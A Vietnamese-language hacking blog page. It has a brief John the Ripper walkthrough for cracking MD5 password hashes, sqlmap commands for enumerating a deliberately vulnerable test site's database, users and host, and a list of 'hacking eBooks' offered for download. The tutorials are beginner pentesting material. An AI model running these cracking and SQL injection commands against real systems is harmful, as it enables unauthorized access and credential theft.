Using John to crack the password

Đây là một cách đơn giản để crack mật khẩu thông qua chương trình “john” trên Kali.

B1: Tạo một file txt chứa user và password.

Mình dùng ứng dụng Leafpad tạo một file “adminpassword.txt” có cấu trúc như ảnh bên dưới và đặt trong thư mục Home > Documents > password. Sau đó vào trong thư mục password và nhấp chuột phải, chọn Open in Terminal.

john

B2: Chạy câu lệnh john.

john –format=raw-MD5 adminpassword.txt

Kết quả:

 

Thu thập thông tin Database bằng sqlmap

Fingerprinting the system and database
Site: http://testphp.vulnweb.com
——

Link bị lỗi SQL Injection: http://testphp.vulnweb.com/search.php?test=query

Get database & DB version.

[email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –b

Get user & role.

[email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –users –roles

Get current user, current database and hostname information.

[email protected]:~# sqlmap -u “http://testphp.vulnweb.com/search.php?test=query” –current-user –current-db –hostname

Pentest & Hacking eBooks For Learning

I have no introduction, just download it and enjoy.

 1. Black Belt Hacking & Complete Hacking Book
 2. Hackers High School 13 Complete Hacking E-books
 3. Penentration Testing With Backtrack 5
 4. A Beginners Guide To Hacking Computer Systems
 5. Black Book of Viruses and Hacking
 6. Secrets of Super and Professional Hackers
 7. Dangerours Google Hacking Database and Attacks
 8. Internet Advanced Denial of Service (DDOS) Attack
 9. Computer Hacking & Malware Attacks for Dummies
 10. G-mail Advance Hacking Guides and Tutorials
 11. Vulnerability Exploit & website Hacking for Dummies
 12. Web App Hacking (Hackers Handbook)
 13. Security Crypting Networks and Hacking
 14. Botnets The Killer Web Applications Hacking
 15. Hacking attacks and Examples Test
 16. Network Hacking and Shadows Hacking Attacks
 17. Gray Hat Hacking and Complete Guide to Hacking
 18. Advance Hacking Exposed Tutorials
 19. 501 Website Hacking Secrets
 20. Internet Security Technology and Hacking
 21. CEH Certified Ethical Hacker Study Guide
 22. Advanced SQL Injection Hacking and Guide
 23. Web Hacking & Penetration testing
 24. OWASP Hacking Tutorials and Web App Protection
 25. CEH – Hacking Database Secrets and Exploit
 26. Ethical Hacking Value and Penetration testing
 27. Hack any Website, Complete Web App Hacking
 28. Beginners Hackers and tutorials 
 29. Ethical Hacking Complete E-book for Beginners
 30. Backtrack : Advance Hacking tutorials
 31. SQL Injection attacks and tutorials by Exploit DB
 32. XSS + Vulnerability Exploitation & Website Hacking
 33. Ultimate Guide to Social Enginnering attacks
 34. White Hat Hacking complete guide to XSS Attacks 
 35. Cross Site Scripting and Hacking Websites 
 36. The Hackers Underground Handbook ( hack the system)
 37. Blind SQL Injection tutorials and Hacking
 38. Hacking Secrets Revealed
 39. Hacking Website Database and owning systems
 40. Reverse Engineering for Beginners 
 41. Reverse Enginnering (The Real Hacking)
 42. Computer Hacking
 43. Hack your Friend using Backtrack
 44. Reverse Enginnering Hacking and Cracking
 45. Hack the System for beginners
 46. Hacking into Computer Systems
 47. Blind SQL Injection Discovery & Exploitation